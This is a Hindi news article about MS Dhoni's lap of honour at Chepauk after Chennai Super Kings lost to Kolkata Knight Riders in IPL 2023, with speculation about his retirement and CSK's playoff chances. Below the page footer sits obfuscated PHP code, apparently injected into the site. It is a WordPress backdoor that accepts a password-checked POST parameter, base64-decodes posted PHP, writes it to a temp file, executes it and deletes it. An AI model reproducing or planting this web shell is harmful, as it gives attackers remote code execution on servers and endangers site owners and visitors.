MS dhoni IPL 2023: क्या अगला सीजन नहीं खेलेंगे धोनी? चेन्नई में फैंस का इस तरह जताया आभार

Uttarakhand Press News, 15 May 2023: आईपीएल 2023 में रविवार को चेन्नई सुपर किंग्स और कोलकाता नाइट राइडर्स के बीच चेपक स्टेडियम में मुकाबला खेला गया। इस मैच में केकेआर ने सीएसके को छह विकेट से हरा दिया। पहले बल्लेबाजी करते हुए चेन्नई ने 20 ओवर में छह विकेट पर 144 रन बनाए थे। जवाब में कोलकाता ने 18.3 ओवर में लक्ष्य हासिल कर लिया। यह चेन्नई का इस सीजन का आखिरी होम मैच था।

टीम ने अब तक 13 मुकाबलों में से सात जीते हैं और उसके 15 अंक हैं। टीम ने पांच मुकाबले हारे भी हैं। अंक तालिका में धोनी की टीम दूसरे स्थान पर है। सीएसके को अब एक और मैच खेलना है, जो कि फिरोज शाह कोटला में दिल्ली कैपिटल्स के खिलाफ होगा। ऐसे में सीएसके को प्लेऑफ के लिए क्वालिफाई करने के लिए उस मैच को जीतना ही होगा। अगर ऐसा नहीं होता है तो टीम को अन्य टीमों के नतीजों पर निर्भर रहना होगा।

बहरहाल, इस सीजन लीग राउंड में अपने आखिरी होम मैच के बाद ही धोनी ने चेन्नई के चेपक में लैप ऑफ ऑनर लिया। उन्होंने साथी खिलाड़ियों के साथ स्टेडियम के चक्कर लगाए और टीम को हमेशा समर्थन देने के लिए फैंस का आभार जताया। धोनी के साथ टीम के सीईओ काशी विश्वनाथन, रवींद्र जडेजा, मोईन अली, अजिंक्य रहाणे, तुषार देशपांडे, दीपक चाहर, कोच स्टीफन फ्लेमिंग समेत पूरी टीम नजर आई। धोनी ने लैप ऑफ ऑनर के दौरान घुटने में चोट की वजह से खास तरह का नी-बैंड भी पहन रखा था। धोनी सीजन की शुरुआत से ही चोटिल थे और मैच के दौरान कई बार लंगड़ा कर चलते भी दिखे।

इस दौरान धोनी के हाथ में एक रैकेट था और उन्होंने सीएसके के लोगो वाली बॉल को दर्शकों को गिफ्ट के तौर पर दिया। इससे पहले वह दर्शकों को कुछ जर्सी भी गिफ्ट कर चुके थे। इस दौरान स्टेडियम में मौजूद पुलिस वाले और अन्य स्टाफ ने भी धोनी के ऑटोग्राफ लिए और उनके साथ तस्वीरें खिंचवाईं। चेपक में अभी क्वालिफायर-वन और एलिमिनेटर समेत प्लेऑफ के दो मैच और खेले जाने हैं।

ऐसे में अब सवाल यह उठता है कि धोनी ने प्लेऑफ से पहले सीएसके के 13वें मैच में ही लैप ऑफ ऑनर क्यों लिया? क्या यह धोनी का आखिरी सीजन है और यह अपने होम ग्राउंड पर धोनी का आखिरी मैच था? क्या अगले सीजन में माही नहीं दिखेंगे? क्या धोनी और सीएसके का साथ छूट जाएगा?

सीएसके के लिए आगे की राह मुश्किल:
पहली बात तो ये कि धोनी की टीम को लीग राउंड का आखिरी मैच दिल्ली में खेलना है। उस मैच में जीत ही चेन्नई का आगे का सफर तय करेगी। अगर सीएसके की टीम वह मैच जीतती है तो उसका अंतिम-चार में स्थान पक्का हो जाएगा। ऐसे में धोनी वापस से सिर्फ एक मैच खेलने चेपक आएंगे। क्वालिफायर-वन में शीर्ष की दो टीमें और एलिमिनेटर में तीसरे और चौथे स्थान पर रहने वाली टीमें भिड़ेंगी। दिल्ली के खिलाफ (20 मई) हारने पर धोनी की टीम को अन्य टीमों के नतीजों पर निर्भर रहना होगा।

ऐसे में धोनी की टीम के सिर्फ 15 अंक ही रह जाएंगे। मुंबई, लखनऊ और बैंगलोर ऐसी टीमें हैं, जो अभी भी 16 या उससे ऊपर अंक बना सकते हैं। इस स्थिति में चेन्नई को अंतिम-चार से बाहर होना पड़ेगा। इन तीनों में से कोई दो टीम भी अपने-अपने एक मैच हार जाती है, तो सीएसके की जगह प्लेऑफ में पक्की हो जाएगी। क्वालिफायर-दो और फाइनल अहमदाबाद के नरेंद्र मोदी स्टेडियम में खेला जाना है।

धोनी अहम फैसले अचानक से लेकर लोगों को चौंकाते हैं:
यह भी हो सकता है कि धोनी ने फैसला ले लिया हो कि यह उनका आखिरी सीजन होगा। धोनी उन खिलाड़ियों में से रहे हैं जो किसी ऐसे फैसले से पहले कोई भनक भी नहीं लगने देते। चाहे वह 2014 में टेस्ट की कप्तानी छोड़ने के समय हो या 2017 में वनडे-टी20 की कप्तानी छोड़ने के समय हो या फिर 2020 में अंतरराष्ट्रीय क्रिकेट से संन्यास लेने के समय हो, धोनी ने कभी किसी को फैसले से पहले कुछ पता नहीं लगने दिया। उनके किसी तरह के पोस्ट के बाद ही लोगों को पता चला।

ऐसे में अब भी धोनी ने यह विचार कर लिया हो और सिर्फ टीम को ही इस बारे में पता हो। इस सीजन धोनी चोटिल भी रहे हैं। उनके घुटने में चोट लगी है और वह लंगड़ाते हुए चलते दिखे। विकेटकीपिंग में भी धोनी को कई बार दिक्कतें हुईं। 41 साल की उम्र में धोनी वैसे तो काफी फिट दिखते हैं, लेकिन ज्यादा दबाव पड़ने से थकान के कारण भी ऐसा होता है। ऐसे में धोनी को लग गया हो कि अब किसी युवा खिलाड़ी को मौका देने का समय आ गया है।

धोनी ने कहा था- यह मेरे करियर का आखिरी दौर:
धोनी ने 2022 में अपने एक बयान में कहा था कि वह अपने घरेलू दर्शकों के सामने ही आईपीएल से संन्यास लेंगे। इसी सीजन एक मैच के बाद धोनी ने कहा था- चाहे मैं जितना भी लंबा खेलूं, लेकिन यह मेरे करियर का आखिरी चरण है। इसका लुत्फ उठाना जरूरी है। दो साल बाद प्रशंसकों को यहां आकर देखने का मौका मिला है। यहां आकर अच्छा लग रहा है। दर्शकों ने हमें बहुत प्यार और स्नेह दिया है। धोनी के बयान में दर्द देखा जा सकता था। हालांकि, इसके बाद कमेंटेटर डैनी मॉरिसन ने धोनी से पूछा था कि क्या यह उनका आखिरी सीजन है? हालांकि, इस पर धोनी ने मजेदार जवाब दिया था। उन्होंने मुस्कुराते हुए कहा, ”आपने फैसला किया है कि यह मेरा आखिरी आईपीएल है, मैंने नहीं।

वहीं, वीरेंद्र सहवाग ने एक क्रिकेट शो के दौरान कहा था- मुझे समझ नहीं आया कि लोग धोनी से संन्यास को लेकर सवाल पूछते भी क्यों हैं? यहां तक कि अगर यह उनका आखिरी साल है भी तो आपको किसी खिलाड़ी से क्यों पूछना है? यह उनकी कॉल है, उन्हें लेने दो! यह उनका आखिरी साल है या नहीं, ये सिर्फ एमएस धोनी ही जानते हैं। धोनी ने खुद कभी अपने संन्यास को लेकर बयान नहीं दिया है और मॉरिसन को दिए गए जवाब से तो ऐसा ही लगता है कि धोनी अगला सीजन भी खेलेंगे।

हर सीजन आखिरी होम मैच के बाद ऐसा करती है CSK की टीम:
ये भी हो सकता है कि धोनी का लैप ऑफ ऑनर होम ग्राउंड पर लीग राउंड खत्म होने पर एक फॉर्मेलिटी हो। ऐसा सीएसके की टीम हर सीजन होम ग्राउंड पर लीग राउंड के अपने आखिरी मैच के बाद करती है। धोनी और बाकी टीम इस दौरान अपने दर्शकों का आभार जताती है और पहले भी हमने ऐसा देखा है। आईपीएल की होम और अवे बेसिस पर तीन साल बाद वापसी हुई थी। 2019 के बाद पहली बार होम-अवे फॉर्मेट पर आईपीएल खेला गया। ऐसे में चेन्नई में भी धोनी 2019 के बाद खेल रहे थे और लैप ऑफ ऑनर का मौका करीब चार साल बाद आया। इस लिए यह और भी खास बन गया।

धोनी और पूरी टीम इस मौके को गंवाना नहीं चाहती थी। 2019 तक लैप ऑफ ऑनर आम बात थी और तब पूरी टीम साथ रहती थी। इसके बाद 2021 में टीम खिताब जीती, लेकिन होम ग्राउंड पर खेलने का मौका नहीं मिला। ऐसे में इस बार लैप ऑफ ऑनर में धोनी के साथ पूरी टीम रही, जिसमें से कुछ खिलाड़ी पहली बार यह देख रहे थे। अब टीम प्लेऑफ की तैयारियों में लगना चाहती हो और प्लेऑफ में पहुंचना अभी तय भी नहीं है। ऐसे में आखिरी होम मैच के बाद टीम ने लैप ऑफ ऑनर लिया।

इस सीजन शानदार फॉर्म में दिखे हैं धोनी:
धोनी इस सीजन अच्छी फॉर्म में दिख रहे थे। उन्होंने जितना देर भी मैदान में बिताया, उतने में उन्होंने कई छक्के लगाए। धोनी ने इस सीजन में अब तक 13 मैचों में 49 की औसत और 196 के स्ट्राइक रेट से 98 रन बनाए हैं। इस दौरान उन्होंने तीन चौके और 10 छक्के लगाए। जिस तरह का समर्थन धोनी को इस सीजन भारत के हर मैदान में मिला, इससे यह तो तय है कि फैंस उन्हें अगला सीजन भी खेलते हुए देखना चाहते हैं। किसी और टीम के होम ग्राउंड में भी हजारों की संख्या में फैंस धोनी और सीएसको को सपोर्ट करने पहुंचे थे। अब यह देखने वाली बात होगी कि माही क्या फैसला करते हैं, लेकिन फैंस बस उन्हें फिर से खेलते देखना चाहते हैं।

Read Previous

Uttarakhand Crime: दोस्त की शादी में जाने को पिता ने नहीं दिए रुपये तो युवक ने दिया लूट को अंजाम….

Read Next

दर्दनाक सड़क हादसा: ट्रक ने पिकअप को मारी टक्कर, 6 लोगो की मौत से मचा कोहराम…

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}